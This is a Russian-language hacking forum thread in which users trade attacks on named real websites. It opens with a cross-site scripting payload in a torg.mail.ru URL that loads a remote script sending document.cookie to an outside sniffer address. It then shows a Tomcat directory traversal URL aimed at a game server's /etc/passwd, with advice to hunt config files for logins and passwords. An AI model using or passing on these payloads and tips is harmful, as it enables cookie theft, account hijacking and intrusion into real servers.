Т.е. выглядеть будет примерно так???:

http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;

если хош украсть куки тебе ишо нужен сниффер!
тута усе расписано было!

Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?

^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы

Где он читает файлы? покажи мне содержимое файла..етс пассв который он прочитал?....Лично он мне ничего не выдал....
Поэтому поиметь с этого ничего нельзя.

спс)

в принципе в etc/passwd храняися пассы но зашифрование...
так же можеш поискать такие полезности как:
/etc/httpd/conf/httpd.conf
/etc/php.ini
/etc/hosts
/etc/my.conf

дальше сам гляди, у меня сайт вапще не открылся =/

/etc/passwd Уже стотыщь лет не хранит хешши паролей..и не обяз в папке /etc/ будут лежать эти файлы..на каждой машине они как правило по разному..

Gorev угу..а на shadow прав не хватит.

2 -m0rgan- мне кажется что в etc/passwd нету ничего интересного, а пассы вроде в shadow хранятся

2 DimOnOID ты прав, мне тоже ничего не выдало, но увидев /etc/passwd дал ответ иcxодя из собственных соображений